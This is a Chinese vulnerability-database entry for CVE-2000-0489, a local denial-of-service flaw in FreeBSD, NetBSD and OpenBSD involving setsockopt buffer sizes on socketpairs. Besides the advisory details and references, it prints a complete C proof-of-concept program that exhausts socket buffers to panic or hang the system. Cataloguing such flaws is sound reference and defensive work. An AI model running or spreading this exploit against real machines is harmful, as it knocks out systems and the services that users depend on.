多厂商setsocopt()拒绝服务漏洞

多厂商setsocopt()拒绝服务漏洞

漏洞ID 1105533 漏洞类型 其他
发布时间 1999-09-05 更新时间 2005-05-02
图片[1]-多厂商setsocopt()拒绝服务漏洞-安全小百科CVE编号 CVE-2000-0489
图片[2]-多厂商setsocopt()拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-199909-012
漏洞平台 BSD CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/19488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-012
|漏洞详情
FreeBSD,NetBSD以及OpenBSD存在漏洞。攻击者通过使用socketpair函数创建大量套接字对,并用setsockopt设置大规模缓存并写入内容的方法导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/622/info

A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.

Details behind why this happens have not been made available. 

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];

while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
|参考资料

来源:XF
名称:bsd-setsockopt-dos
链接:http://xforce.iss.net/static/3298.php
来源:BUGTRAQ
名称:19990826LocalDoSinFreeBSD
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BUGTRAQ
名称:20000601LocalFreeBSD,Openbsd,NetBSD,DoSVulnerability-MacOSXaffected
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:622
链接:http://www.securityfocus.com/bid/622

相关推荐: Nathaniel Bray Yeemp Arbitrary File Modification Vulnerability

Nathaniel Bray Yeemp Arbitrary File Modification Vulnerability 漏洞ID 1101878 漏洞类型 Input Validation Error 发布时间 2002-07-08 更新时间 2002-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享